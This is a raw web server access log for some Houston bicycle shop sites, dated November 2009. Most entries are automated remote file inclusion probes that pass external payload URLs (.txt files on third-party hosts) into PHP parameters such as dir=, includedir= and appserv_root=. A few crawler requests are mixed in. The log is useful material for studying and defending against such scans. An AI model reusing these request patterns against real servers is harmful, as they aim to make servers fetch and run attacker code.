116.127.121.116 - - [12/Nov/2009:00:00:58 -0800] "GET /logs/access.log%20%20//bbs/skin/zero_vote/setup.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
116.127.121.116 - - [12/Nov/2009:00:00:59 -0800] "GET /logs//bbs/skin/zero_vote/setup.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
116.127.121.116 - - [12/Nov/2009:00:00:59 -0800] "GET /bbs/skin/zero_vote/setup.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
116.127.121.116 - - [12/Nov/2009:00:03:48 -0800] "GET /logs/access.log//bbs/skin/zero_vote/setup.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
116.127.121.116 - - [12/Nov/2009:00:03:48 -0800] "GET /bbs/skin/zero_vote/setup.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
116.127.121.116 - - [12/Nov/2009:00:03:48 -0800] "GET /logs//bbs/skin/zero_vote/setup.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
116.127.121.116 - - [12/Nov/2009:00:08:28 -0800] "GET /logs/access.log//bbs/skin/zero_vote/setup.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
116.127.121.116 - - [12/Nov/2009:00:08:28 -0800] "GET /bbs/skin/zero_vote/setup.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
116.127.121.116 - - [12/Nov/2009:00:08:28 -0800] "GET /logs//bbs/skin/zero_vote/setup.php?dir=http://denie.fileave.com/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.25.94.14 - - [12/Nov/2009:00:11:49 -0800] "GET /logs/access.log//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
85.25.94.14 - - [12/Nov/2009:00:11:49 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
85.25.94.14 - - [12/Nov/2009:00:11:50 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
124.138.172.3 - - [12/Nov/2009:00:16:43 -0800] "GET /skin/zero_vote/error.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.138.172.3 - - [12/Nov/2009:00:16:43 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.138.172.3 - - [12/Nov/2009:00:16:43 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:00:17:48 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:00:17:48 -0800] "GET /skin/zero_vote/error.php?dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:00:17:48 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:00:17:59 -0800] "GET /skin/zero_vote/error.php?dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:00:17:59 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:00:17:59 -0800] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.138.172.3 - - [12/Nov/2009:00:19:05 -0800] "GET /skin/zero_vote/error.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.138.172.3 - - [12/Nov/2009:00:19:06 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.138.172.3 - - [12/Nov/2009:00:19:06 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.92.156.53 - - [12/Nov/2009:00:22:10 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.92.156.53 - - [12/Nov/2009:00:22:11 -0800] "GET /logs/access.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.92.156.53 - - [12/Nov/2009:00:22:11 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.92.156.53 - - [12/Nov/2009:00:22:24 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.92.156.53 - - [12/Nov/2009:00:22:24 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.92.156.53 - - [12/Nov/2009:00:22:24 -0800] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
85.25.94.14 - - [12/Nov/2009:00:22:39 -0800] "GET /logs/access.log%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:00:23:53 -0800] "GET /skin/zero_vote/error.php?dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:00:23:53 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:00:23:53 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:00:23:56 -0800] "GET /skin/zero_vote/error.php?dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:00:23:56 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
124.0.143.66 - - [12/Nov/2009:00:23:56 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://attle.co.kr//bbs///skin/ChuckyBoard2/idxx.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.115.180.221 - - [12/Nov/2009:00:24:07 -0800] "GET /skin/zero_vote/error.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.115.180.221 - - [12/Nov/2009:00:24:07 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.115.180.221 - - [12/Nov/2009:00:24:07 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.115.180.221 - - [12/Nov/2009:00:24:10 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.115.180.221 - - [12/Nov/2009:00:24:10 -0800] "GET /skin/zero_vote/error.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
210.115.180.221 - - [12/Nov/2009:00:24:10 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.greatcreations.biz//joomla1/modules/mod_stats/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.92.156.53 - - [12/Nov/2009:00:32:16 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
209.92.156.53 - - [12/Nov/2009:00:32:16 -0800] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.64.75.54 - - [12/Nov/2009:00:33:10 -0800] "GET /main.php?appserv_root=http://pastie.org/661597.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.64.75.54 - - [12/Nov/2009:00:33:10 -0800] "GET /logs/access.log%20%20/main.php?appserv_root=http://pastie.org/661597.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.64.75.54 - - [12/Nov/2009:00:33:10 -0800] "GET /logs/main.php?appserv_root=http://pastie.org/661597.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
69.64.75.54 - - [12/Nov/2009:00:54:33 -0800] "GET /logs/access.log/main.php?appserv_root=http://pastie.org/661597.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
204.232.149.234 - - [12/Nov/2009:01:21:03 -0800] "GET /?sayfa=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
204.232.149.234 - - [12/Nov/2009:01:21:04 -0800] "GET /logs/access.log%20%20/?sayfa=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
204.232.149.234 - - [12/Nov/2009:01:21:04 -0800] "GET /logs/?sayfa=http://www.palco.tv/tcm/logs/idxx.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.112.114 - - [12/Nov/2009:01:25:13 -0800] "GET /bullitinboard/viewtopic.php?p=15763 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
190.97.219.4 - - [12/Nov/2009:01:30:00 -0800] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.88.43.25 - - [12/Nov/2009:01:31:26 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.svbikes.com"
190.97.219.4 - - [12/Nov/2009:01:32:56 -0800] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
190.97.219.4 - - [12/Nov/2009:01:32:59 -0800] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
190.97.219.4 - - [12/Nov/2009:01:33:09 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://imagehut.ws/images2/raid.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
119.63.193.75 - - [12/Nov/2009:01:39:52 -0800] "GET /bullitinboard/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
119.63.193.75 - - [12/Nov/2009:01:41:57 -0800] "GET /bullitinboard/viewtopic.php?p=4429 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
80.92.181.165 - - [12/Nov/2009:01:49:50 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "HolmesBot (http://holmes.ge)" "www.svbikes.com"
77.221.130.17 - - [12/Nov/2009:02:32:54 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:32:54 -0800] "GET /appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:32:54 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:32:58 -0800] "GET /appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:32:58 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:32:58 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:33:18 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:33:18 -0800] "GET /appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:33:18 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:37:39 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:37:39 -0800] "GET /appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:37:40 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:37:40 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:37:40 -0800] "GET /appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:37:40 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:37:40 -0800] "GET /appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:37:40 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:37:41 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
218.149.84.14 - - [12/Nov/2009:02:48:13 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.topclimat.ru/banners/id? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:51:43 -0800] "GET /appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:51:43 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:51:43 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:51:48 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:51:48 -0800] "GET /appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:51:48 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:52:00 -0800] "GET /appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:52:00 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:52:00 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
218.149.84.14 - - [12/Nov/2009:02:52:14 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.topclimat.ru/banners/id? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.149.84.14 - - [12/Nov/2009:02:52:14 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://www.topclimat.ru/banners/id? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
218.149.84.14 - - [12/Nov/2009:02:52:15 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://www.topclimat.ru/banners/id? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:53:05 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:53:05 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:53:05 -0800] "GET /appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:53:13 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:53:13 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:53:13 -0800] "GET /appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:53:26 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:53:26 -0800] "GET /appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:53:26 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
220.181.94.214 - - [12/Nov/2009:02:56:03 -0800] "GET / HTTP/1.1" 200 1764 "-" "Sogou-Test-Spider/4.0 (compatible; MSIE 5.5; Windows 98)" "www.houstonbikeshop.com"
220.181.94.214 - - [12/Nov/2009:02:56:13 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:57:57 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:57:57 -0800] "GET /appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:58:21 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:58:21 -0800] "GET /appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:58:21 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:58:44 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:58:44 -0800] "GET /appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:02:58:45 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.muprosgame.com///kampret/rocks.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:03:00:28 -0800] "GET /appserv/main.php?appserv_root=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:03:00:28 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:03:00:28 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:03:02:07 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:03:02:07 -0800] "GET /appserv/main.php?appserv_root=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:03:02:07 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:03:02:53 -0800] "GET /appserv/main.php?appserv_root=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:03:02:53 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.221.130.17 - - [12/Nov/2009:03:02:53 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.112.114 - - [12/Nov/2009:03:06:22 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
67.195.112.114 - - [12/Nov/2009:03:06:22 -0800] "GET /translations/?M=A HTTP/1.0" 200 3831 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
77.221.130.17 - - [12/Nov/2009:03:06:55 -0800] "GET /appserv/main.php?appserv_root=http://www.muprosgame.com/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
